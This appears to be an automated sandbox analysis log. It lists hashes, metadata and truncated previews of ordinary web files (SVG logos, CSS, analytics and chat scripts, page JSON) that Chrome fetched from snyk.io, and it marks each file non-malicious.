                                                                                                                                                                                                                                                                                                              SSDEEP:6:tnrVli/UTumc4slvIXK7VLhLQ3cpRkWbD6+:trVumuCXgh23c/Tbe+
                                                                                                                                                                                                                                                                                                              MD5:E1D072F143FE3601A332525409D30B40
                                                                                                                                                                                                                                                                                                              SHA1:4DCD67A059FB2D48D369DE5D5EA7234ADF6BBDE1
                                                                                                                                                                                                                                                                                                              SHA-256:305BE9E636846FFD82C4865B5FA2B9763EECA988BC3586A871D3B81A93CE0548
                                                                                                                                                                                                                                                                                                              SHA-512:527C341A4241EC99383AC3501ABFE491CADCF6BFB5A715CF9DA0E8FDE612132269FE206DF468F888AD36F68177FE2044D8A8383B6733D2E61530CAD2ABDEE4BD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-marketingwp/icon-dropdown.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="12" height="8" viewBox="0 0 12 8" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M1.41 0.294983L6 4.87498L10.59 0.294983L12 1.70498L6 7.70498L0 1.70498L1.41 0.294983Z" fill="#145DEB"/>.</svg>.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1490)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1559
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.120755987626891
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:iKQKFYYCvoDlgVDyNQ2glkMBaqNTYEZqNF5XmbxDy:jJmYoyGPlkMBa+TrZqp2y
                                                                                                                                                                                                                                                                                                              MD5:3867B2388B619FF7FDDC29EF359FC9AA
                                                                                                                                                                                                                                                                                                              SHA1:511BED0C4D3D57AB4CF1B1D7596FB845ECFBA6AC
                                                                                                                                                                                                                                                                                                              SHA-256:31892C21AE4FB908A875BBE29DBF0DF74C2E84171CFBCAC23540F3AD8222A35A
                                                                                                                                                                                                                                                                                                              SHA-512:7BFD6E6CD2FE7A79F4797439BC7294A36D076D67A3DC5BB8E86FA5AF19B50F0E8FEC18BF33B30588486B231062E43F417708333044207A586AAD999E97E819A5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[493],{9254:function(n,e,t){function i(n,e){var t,i;return"boolean"==typeof(null==e?void 0:e.enabled)?e.enabled:null===(i=null===(t=null==n?void 0:n.__default)||void 0===t?void 0:t.enabled)||void 0===i||i}t.d(e,{n:function(){return i}})},5081:function(n,e,t){t.r(e),t.d(e,{schemaFilter:function(){return o}});var i=t(5163),r=t(9254);function o(n,e){function t(t){var o=n,u=t.event.event;if(o&&u){var a=o[u];if(!(0,r.n)(o,a))return t.updateEvent("integrations",(0,i.pi)((0,i.pi)({},t.event.integrations),{All:!1,"Segment.io":!0})),t;var s=function(n,e){var t,i;if(!n||!Object.keys(n))return{};var r=n.integrations?Object.keys(n.integrations).filter((function(e){return!1===n.integrations[e]})):[],o=[];return(null!==(t=e.remotePlugins)&&void 0!==t?t:[]).forEach((function(n){r.forEach((function(e){n.creationName==e&&o.push(n.name)}))})),(null!==(i=e.remotePlugins)&&void 0!==i?i:[]).reduce((fu
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):31202
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.967600662280177
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:B8J/cugXGUqofjhZP2rQlCNruH3XBMmBSg7tz7ej:BA/PghqoLirc3XKm8Cgj
                                                                                                                                                                                                                                                                                                              MD5:2A324835AB92FD70444C16AB58457AE1
                                                                                                                                                                                                                                                                                                              SHA1:CD3D2E701A52F5AB6529B439FCDBAA360EF9EE7E
                                                                                                                                                                                                                                                                                                              SHA-256:D9E960BFD90ECED67993F736141A28D11B01E0273EBBE46C667A0F9D7628A120
                                                                                                                                                                                                                                                                                                              SHA-512:AE277BC6284F9095122717DA5F4191047A6DA739B5A826939C3C2236E25DD0838F2A0D717A05FD0672C6D37B492C9AA3C32966FC8BDDECCEE975564886124B2D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1616767497/wordpress-sync/logo-australia-post.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg viewBox="0 0 1203 423" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><image height="423" width="1203" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABLMAAAGnCAYAAABM/RVIAAAACXBIWXMAAAsSAAALEgHS3X78AAAgAElEQVR4XuzdbWxc933m/evMGVqySomSk9pWBmsyfVG5WNNDKfarBubodlHcQaGSgRfbru1ETBtv0rpby7u2uwjqiq4LI5sENZ1u2uS2U9NJnE0fAlMVemcRVKuRm76SI5Ghgdh9saa8PbWTu4lFSZUfyDP/+8UZipREzm9meGbmPHw/gOGHuSjL5IjwufT7//6ec07NCvy941KtImlE8katPAAg79wJSVV5tZnS8vyslQYAAAAAi2eVWYE/vFMqHJI0IXmDDcMAAGzInZE0WQrnpq0kAAAAAGykYZkVTWK5aUkDG4YAAGiJOyP5E6XwVNVKAgAAAMCV1i2zomksb0oqHFznYwAAiIF7rBTOTVopAAAAAFjrqjIrKrL8qqTyuh8BAEBsas+Vwh9MWCkAAAAAWFFY+zcUWQCA7iocDPxbp60UAAAAAKy4rMyKjhZSZAEAuqlwMPBHDlkpAAAAAJDWHDOsL3t/wcgDANAZXri3tDw/a8UAAAAA5FtBWjle6KaNLAAAneMKU1YEAAAAAOrHDAuHJA00TAIA0FHeaODvq1gpAAAAAPm2sjNrolEIAIDuCCetBAAAAIB8K0S7srxBKwgAQOd5o0HxliErBQAAACC/ClKtYoUAAOga51esCAAAAID8KkgasUIAAHSPq1gJAAAAAPlVkLxRKwQAQPd4Q0YAAAAAQI4VBABAonhMDAMAAADYEGUWACBpBqwAAAAAgPyizAIAAAAAAEBqUGYBAAA
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65514), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):75439
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.130404288391323
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:mofwwRdJ8kfqyAqy9yeiRGw2WcrNXr9faMe:moJEyTy9yFRyJrI
                                                                                                                                                                                                                                                                                                              MD5:EEC6F83830445756DFD306CA6A0B9FD9
                                                                                                                                                                                                                                                                                                              SHA1:456EA4D5EAD4168D9D2DAABC8E6A99446E244C92
                                                                                                                                                                                                                                                                                                              SHA-256:6D875972CB7ECD49A0C1CF4F2163F096B5C0A4F4175C037F8F4C7E3EFE2F2B3E
                                                                                                                                                                                                                                                                                                              SHA-512:DA80FD97619471C52DF5E26E0C23A44F768E50970B6742460BE6D37326124D2878133DB63C6FB5C1D7C7C8DB53A5D88249AFB6823D651D51E734DD9CDF061CBC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6atdjnf02gN2lri6QJutpC","type":"Entry","createdAt":"2022-11-04T16:35:55.460Z","updatedAt":"2024-03-14T20:38:21.391Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":70,"revision":18,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Application security solution page","title":"Application security (AppSec) solution | Snyk","slug":"application-security","uri":"solutions/application-security","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4c4Qt7ApbCj77DFG9wysIj","type":"Entry","createdAt":"2022-11-04T16:35:55.626Z","updatedAt":"2024-07-26T13:14:07.431Z","environment":{"sys":{"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 3013
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1343
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.846151361722259
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:XZ4Hjl9i7F/Oajiwwsaj9u4f+0HNw37gfTMtJ9gvKyjV0BUmr8Q56Lt:XZ4HcOwiwwsoffy7ff9giyeD0Lt
                                                                                                                                                                                                                                                                                                              MD5:A2B1AA1A0E402B1F891C929F94449D47
                                                                                                                                                                                                                                                                                                              SHA1:7E1A4A1F5943973E090203B040140F047655391C
                                                                                                                                                                                                                                                                                                              SHA-256:CC74BA8D8C6BCB2241B30F1DD4CE80A6C27427895CB9EE1047DCC90F368AF1C7
                                                                                                                                                                                                                                                                                                              SHA-512:F2D09931D7A97EA765DC2C94552148CEB50F0E0EE1898FDCCFAC106421BCB890E9BFBE87469A95812BB1B2AB55EF329E476EBF4E95394701955B53BDA72810DB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:...........V[o.6.~.9@.Q...^V+\Q,...i.u{2...N.v2..T<....$...}.`X...;...V:7..IaLQ....JjY.=..,"...Xi...^....&v.....\...o. ......U.r..-..."]?....9...u...7..6..k...<4.8$B.bo..v.. .....J.i...0.,X...e.x.`...B..iy.x...7i..9U..........5..M..F.Ok......L.eb..ql.j....jw.....,,.$.y.H...b.]&~....?.z....b.)-..Q.>..M{.d...UUn....9.a..........3...X.^j...i1. ~.....zA..v...d$..W.A..S.h\I.Re..S6....(.....M..o...m..z;.4L...3V...:.....?...].....r6..^8.6.....Z...YvX+.......F..L.L...|0n.....Kzw..6.k.a..Vm..^....f..?..m..7...uNF".....lVKS.q...|.V...Y..S...2lVY.\....4.=eL....j;..K..+.m.4.0..ZO).!.].|..AJL...]M>..."...^..e...D.eI.;.,.O.n..7..=9F...c./.\...dO.\....i...\,v0D._";.y.Y.>.0..Z.|.8.....^y.{3{D.....0"... .3G-....h.A.Q.BZ...X..aY.._....+....7)..A.u.!.p9.v[..'....:v..3.....r.$n.!..q-..4..[.K.&=.%....QR;.B.q..llBn...7A...W....MH... 7`q..VV.#83R.........).S.]v....(.R.C..w..v.7..jo`.6E...%.....#...[e.^.....".....3.r..&G.......`..hs...;9s.U.........5..D.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1447x847, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):11338
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9786875236879355
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:zulME5xMqbgQ5d6AHv4z0I7YOEWSI6emYF+51/OKsjQHbD4frIJ490u:Anf6Tr7YNWSImf0dfv7
                                                                                                                                                                                                                                                                                                              MD5:B67EEC20C2A38B91D151F6FA63E3C5A8
                                                                                                                                                                                                                                                                                                              SHA1:5BDC5C53D4A7701E013699FB963262D8475B845A
                                                                                                                                                                                                                                                                                                              SHA-256:380BA97633EC42C742BC859D92E9641E512D6970C43AAFCF28151FF68462C6F3
                                                                                                                                                                                                                                                                                                              SHA-512:93B344B83B8205ABCC7CBC299769576D0B5E5C7B650389A569082D0B146CA6AAC918A3E5820F133C6C03B5DB91929F364A07DBA3A005AEC4AA0479A781FF15CB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1723050301%2Fwebsite-heroes%2Fbackground-images%2Fhero-homepage-2024.jpg&w=2560&q=75
                                                                                                                                                                                                                                                                                                              Preview:RIFFB,..WEBPVP8 6,......*..O.>.H.L...-...: ..gn.......g.../...O.y.W.M...Kv..p&..-..a.b....}_.?.....Yo3~.?0^..g..=2.........O.K.+.....v...@BL...T@.d.a...c...r.K..o....D]Y....4h..o^.z...,..o.....=.W1(.....|.....N!,g..1.$.ZtBZ[.Hu...F..SNV..$.=....d|.G.....T...b..{...NN.;...X.e.x/..u......5............s...D/&L.p".X"....p.....[......a.h....W.......U|#..%:m...}..b..g...K..S....Ivt.F..f.g...lh..xD...../2...S...?.H...OoC....;.l.....jM.zG.|.SK...{..r$..\..<..R..}.0..T{.#........s......|...|.c.....e..*..1C....bxh...Z1.].....|....^........tO.B$BE.VJA..`_E...yh....d.z..:.X.E.../G:.zK.W|.,X.i...C.c.-......]e..q.........fy2e*..}..6.\.....g.+f.Q....:<..<...v. Y.BO.b..qp,@.....;.u...W...v1.^..4...Ya......42hr.wDp^g....O.. Ar ..........5 ...6[.`...7..6..."...s.S..3fk. .nQ...#...3.....P0V.3N.0.q.....3........Ob\... .,F...P.q........K.Rl.f....j..GS[_M......z.&;..)b..)..A[)..3.W.......6n;.@...D..R<.1...e.z-....Gg8..Vo.4.@..)6l.n\x..X...S{....%kw\.Yp.6.F..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                              MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                                                                                              SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                                                                                              SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                                                                                              SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):17
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.734521664779752
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Wd4M:IB
                                                                                                                                                                                                                                                                                                              MD5:0C8B00B4F600A84E8910C15984A27B9F
                                                                                                                                                                                                                                                                                                              SHA1:3DABC5AB449517DE463375F1D1367E808B91D566
                                                                                                                                                                                                                                                                                                              SHA-256:F454E98843E4585608FF421E6FCC613C10AE01AE56C2EFF0999EA222AB4A3E00
                                                                                                                                                                                                                                                                                                              SHA-512:04F5EEB9193317B2C31B4E1F09296695FF882AD4163413D0420342D9D5CAF3A249C00932BEC512D31D5B4E6D501439E636E13781CC66D6B0BC5B1649DF25D9A3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://trackingapi.trendemon.com/api/experience/personal-stream?AccountId=2025&ClientUrl=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&MarketingAutomationCookie=&ExcludedStreamsJson=%5B%5D&callback=jsonp386460&vid=2025:17297993867885496
                                                                                                                                                                                                                                                                                                              Preview:jsonp386460(null)
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):2154333
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0112752195715045
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:+6oN9JOUJ5lNvQqVR7sGnMmrXrwSXD7Xde0R7p6QTeE5pLq4dN/hrc219/g6fACp:g
                                                                                                                                                                                                                                                                                                              MD5:F1EBC1A3131766827823CFAF6AE111B0
                                                                                                                                                                                                                                                                                                              SHA1:4ED415852B64DD1E2264F64294ECA5231FE6B4B2
                                                                                                                                                                                                                                                                                                              SHA-256:EF2F1609F84B4B15B281EB1CD9FCEC778EA0E183DD0E59BC8029AEA7C6726686
                                                                                                                                                                                                                                                                                                              SHA-512:5B1AF45A6D37A64B145073A39EC39A0BCC6B0C0B8F6335B8E6CB38F731CFE6CBFF322961FB6A78DAE94E987DBEAD93C8ADDC69DEB182382F0C739AACFD8A7ACA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/css/26b648d8446363b8.css
                                                                                                                                                                                                                                                                                                              Preview:@import"https://fonts.googleapis.com/css2?family=Big+Shoulders+Display:wght@100..900&family=Poppins:ital,wght@0,400;0,600;0,700;1,400;1,600;1,700&family=Roboto+Mono:ital,wght@0,100..700;1,100..700&family=Roboto:ital,wght@0,400;0,500;0,700;1,400;1,500;1,700&display=swap";@font-face{font-family:brandui-icons;src:url(https://res.cloudinary.com/snyk/raw/upload/snyk-mktg-brandui/icons-font/brandui-icons.eot?v=1.0.3);src:url(https://res.cloudinary.com/snyk/raw/upload/snyk-mktg-brandui/icons-font/brandui-icons.eot?v=1.0.3#iefix) format("embedded-opentype"),url(https://res.cloudinary.com/snyk/raw/upload/snyk-mktg-brandui/icons-font/brandui-icons.ttf?v=1.0.3) format("truetype"),url(https://res.cloudinary.com/snyk/raw/upload/snyk-mktg-brandui/icons-font/brandui-icons.woff?v=1.0.3) format("woff");font-weight:400;font-style:normal;font-display:block}*{outline:none;margin:0;padding:0;box-sizing:border-box}body,html{width:100%}body{font-size:1rem;font-family:Roboto,sans-serif;color:#383f76;-webkit-f
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):6151
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.145990881782335
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:ZK3AFOE5TXAxbzmBjGScaWaVaAIwlp+xO0AK5eVPNAvg/n/:ZKeVXARzmPVa9wlp+Y0ALaE/
                                                                                                                                                                                                                                                                                                              MD5:A16E2D1ED653EE8B964322708AD507BE
                                                                                                                                                                                                                                                                                                              SHA1:71288783C904E14B41CE98A691F00AFE200F6FF1
                                                                                                                                                                                                                                                                                                              SHA-256:8C797492718B60CEADEA625D078561328DA6CC0FFC49D41EEEE781E302C0104C
                                                                                                                                                                                                                                                                                                              SHA-512:FE54BA2C5CDE6B9917C97257534F8686EE1A4277704A3869A6B98E085F5A0B1B4B87F034E2957FC07DA9009E24DBCBA3E6DFAAC1A8058392D2AAD43D3618081D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1677605848/website-customer-logos/logo-aws.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="73" height="48" viewBox="0 0 73 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8324_37137)">.<g clip-path="url(#clip1_8324_37137)">.<path d="M20.9612 17.7359C20.9612 18.6127 21.056 19.3237 21.2219 19.845C21.4115 20.3664 21.6485 20.9352 21.9803 21.5513C22.0988 21.7409 22.1462 21.9305 22.1462 22.0964C22.1462 22.3334 22.004 22.5704 21.6959 22.8074L20.2029 23.8027C19.9896 23.9449 19.7763 24.016 19.5867 24.016C19.3497 24.016 19.1127 23.8975 18.8758 23.6842C18.544 23.3287 18.2596 22.9496 18.0226 22.5704C17.7856 22.1675 17.5486 21.7172 17.288 21.1722C15.4395 23.3524 13.117 24.4426 10.3206 24.4426C8.32988 24.4426 6.74208 23.8738 5.58084 22.7363C4.41961 21.5987 3.82715 20.082 3.82715 18.1861C3.82715 16.1718 4.53811 14.5366 5.98372 13.3042C7.42934 12.0719 9.34892 11.4557 11.7899 11.4557C12.5956 11.4557 13.4251 11.5268 14.3019 11.6453C15.1788 11.7638 16.0793 11.9534 17.0273 12.1667V10.4367C17.0273 8.6356 16.6481 7.37958 15.9134 6.64492C15.1551 5.91027 13.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):226668
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.317943086064524
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:XmqIZl5phQk+VC+xyLRcP2QJ0roSjdDTtS223EM/LuJPj:mM2qQDTtSn/ihj
                                                                                                                                                                                                                                                                                                              MD5:182931EB99AFB01276B448D2F7BD627D
                                                                                                                                                                                                                                                                                                              SHA1:09112ACDC7C5ACD008FF83960E3C5C0D9FD32B56
                                                                                                                                                                                                                                                                                                              SHA-256:E96ABB18E70ACF14065E3BACB0DBD6942579A85D3D69D9D7551BEA9C627CA3A0
                                                                                                                                                                                                                                                                                                              SHA-512:8D326DEAF54FD6DC8A06A62BC271906B2905B0B9A2FA85956E3EA5A86454ECEDDFBE865DA6C28E9D124C173620FAD727F90EADC6C83E9312491A00692B5B4652
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:!function(e){function webpackJsonpCallback(t){for(var r,o,i=t[0],s=t[1],c=0,u=[];c<i.length;c++)o=i[c],n[o]&&u.push(n[o][0]),n[o]=0;for(r in s)Object.prototype.hasOwnProperty.call(s,r)&&(e[r]=s[r]);for(a&&a(t);u.length;)u.shift()()}var t={},n={0:0};function __webpack_require__(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,__webpack_require__),r.l=!0,r.exports}__webpack_require__.e=function requireEnsure(e){var t=[],r=n[e];if(0!==r)if(r)t.push(r[2]);else{var o=new Promise(function(t,o){r=n[e]=[t,o]});t.push(r[2]=o);var i,a=document.createElement("script");a.charset="utf-8",a.timeout=120,__webpack_require__.nc&&a.setAttribute("nonce",__webpack_require__.nc),a.src=function jsonpScriptSrc(e){return __webpack_require__.p+"assets/"+({}[e]||e)+"."+{1:"37afe153",2:"2a722653",3:"ee35dea2"}[e]+".chunk.js"}(e);var s=new Error;i=function(t){a.onerror=a.onload=null,clearTimeout(c);var r=n[e];if(0!==r){if(r){var o=t&&("load"===t.type?"missing"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):92674
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.288414419714851
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:aituX55DPfb/wFG26UtHnbTcCAC0dn4Bs9qatj9N+jpT:Z+hwFGme4nT
                                                                                                                                                                                                                                                                                                              MD5:16D7AE86E21434A32157D3226AC9BB77
                                                                                                                                                                                                                                                                                                              SHA1:6EAA4577EFA2568AA7752B00AA42523BDA14CA95
                                                                                                                                                                                                                                                                                                              SHA-256:6C9C6406C9BD9814CF84974221433003377B67F071EC5411FDDBCBA4EC109BCA
                                                                                                                                                                                                                                                                                                              SHA-512:818A9CBFACFBC15F382F286E9C5B3476C4F508B30F4DAD880309C586C8725C52CA43266E3B04912A9E0423D93DA15997F3EAE563542767EDA63321E1BCEC1DEB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/14.e24a6190.chunk.js
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[14],{"+WaJ":function(e,t,r){"use strict";function isFunction(e){return"function"===typeof e}r.d(t,"a",function(){return isFunction})},"/V3T":function(e,t,r){"use strict";var n=r("13WS"),o=function(e){function Action(t,r){return e.call(this)||this}return n.a(Action,e),Action.prototype.schedule=function(e,t){return void 0===t&&(t=0),this},Action}(r("LR82").a);r.d(t,"a",function(){return i});var i=function(e){function AsyncAction(t,r){var n=e.call(this,t,r)||this;return n.scheduler=t,n.work=r,n.pending=!1,n}return n.a(AsyncAction,e),AsyncAction.prototype.schedule=function(e,t){if(void 0===t&&(t=0),this.closed)return this;this.state=e;var r=this.id,n=this.scheduler;return null!=r&&(this.id=this.recycleAsyncId(n,r,t)),this.pending=!0,this.delay=t,this.id=this.id||this.requestAsyncId(n,this.id,t),this},AsyncAction.prototype.requestAsyncId=function(e,t,r){return void 0===r&&(r=0),setInterval(e.flush.bind(e,this),r)},AsyncAction.prototype.re
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1724
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.888866409435775
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHm6S31HfVhOGM+6bqFabnLFKE6pSYEy5IDiDu6:tTy/OGM+iqFaVKRMYE9X6
                                                                                                                                                                                                                                                                                                              MD5:6B5F3B0ECF9843596807E610D535A0AA
                                                                                                                                                                                                                                                                                                              SHA1:18DCF9F3509BFCF96C70170514AEC51779A2701C
                                                                                                                                                                                                                                                                                                              SHA-256:3F76288D6FE9B9C1340BA0FE7FB295FB0988C143667B7B7A2C8A93FFDFF68C39
                                                                                                                                                                                                                                                                                                              SHA-512:DEAEC8648E808BC1F112CFCD1AEB8E97FAF43FA9BB759D35D564A33B569EFF3858BA71A7E52BD8B52ADA704E874F06BD9FA7726793F84494878218E63D951996
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/product-logos/iac.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="10.7852" x2="68.1675" y1="3.99999" y2="17.5669"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#145deb"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="60" x2="25.0232" y1="22" y2="28.6732"><stop offset="0" stop-color="#43b59a"/><stop offset="1" stop-color="#ffe792"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m27.5 59.9867c-.1247.0177-.2513.0177-.376 0-15.7794-5.2786-23.12277-15.9992-23.12277-33.7929v-13.9832c-.01186-.2571.06238-.5108.21116-.7216.14878-.2107.36372-.3668.6113-.4437l22.32381-6.99163c.2295-.07156.4755-.07156.705 0l22.3238 6.99163c.2476.0769.4625.233.6113.4437.1488.2108.223.4645.2112.7216v8.145c-.6217.7049-.9988 1.6306-.9988 2.6444v4c0 .0195.0001.039.0004.0584.0002.014.0005.0279.0008.0419-.3235-.0658-.6583-.1003-1.0012-.1003h-5c-
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
